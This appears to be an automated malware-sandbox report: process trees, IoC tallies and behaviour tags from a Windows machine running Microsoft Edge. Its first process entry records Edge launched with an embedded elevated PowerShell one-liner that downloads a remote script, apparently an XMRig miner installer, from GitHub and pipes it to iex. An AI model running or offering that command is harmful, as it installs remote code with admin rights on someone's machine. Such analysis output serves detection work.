WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 4804 WINWORD.EXE 5328 ONENOTE.EXE 5328 ONENOTE.EXE 5328 ONENOTE.EXE 5328 ONENOTE.EXE 5328 ONENOTE.EXE 5328 ONENOTE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 4512 wrote to memory of 3064 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3064 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 1036 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3928 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3928 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe PID 4512 wrote to memory of 3340 4512 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex1⤵
- Access Token Manipulation: Create Process with Token
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffe84b646f8,0x7ffe84b64708,0x7ffe84b647182⤵PID:3064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:22⤵PID:1036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:82⤵PID:3340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:12⤵PID:1276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:12⤵PID:4012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:12⤵PID:3616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:12⤵PID:3424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:12⤵PID:3784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:12⤵PID:3888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5952 /prefetch:82⤵PID:4304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
PID:1256 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x130,0x12c,0x128,0x280,0x120,0x7ff7bcf45460,0x7ff7bcf45470,0x7ff7bcf454803⤵PID:2608
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5952 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:12⤵PID:4828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,10072927126778511633,12318493014359535755,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:12⤵PID:1640
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1084
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:4972
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding1⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2724 -
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon2⤵
- System Location Discovery: System Language Discovery
PID:4504 -
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 31482⤵
- Program crash
PID:5752
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵
- Drops file in Windows directory
PID:2144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2724 -ip 27241⤵PID:5496
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1096 -
C:\Windows\system32\dashost.exedashost.exe {5d4e7e6f-16cc-4901-9e3e68e11b2f1004}2⤵PID:5876
-
-
C:\Windows\System32\DataExchangeHost.exeC:\Windows\System32\DataExchangeHost.exe -Embedding1⤵PID:1864
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2016 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ffe84b646f8,0x7ffe84b64708,0x7ffe84b647182⤵PID:748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:22⤵PID:6100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:6128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:12⤵PID:980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:12⤵PID:744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3648 /prefetch:82⤵PID:5236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:12⤵PID:5648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:12⤵PID:2632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5624 /prefetch:82⤵PID:3360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5624 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:12⤵PID:1452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:12⤵PID:6140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2248,6600434187240440340,2008394251656278289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:12⤵PID:3608
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3184
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1036
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5332 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffe84b646f8,0x7ffe84b64708,0x7ffe84b647182⤵PID:5340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:22⤵PID:1888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:82⤵PID:5052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:12⤵PID:4400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:12⤵PID:1988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:12⤵PID:4712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:12⤵PID:6048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3524 /prefetch:82⤵PID:5748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3524 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:12⤵PID:4612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:12⤵PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:12⤵PID:2128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9052062533695348487,18117910413452965667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:12⤵PID:4184
-
-
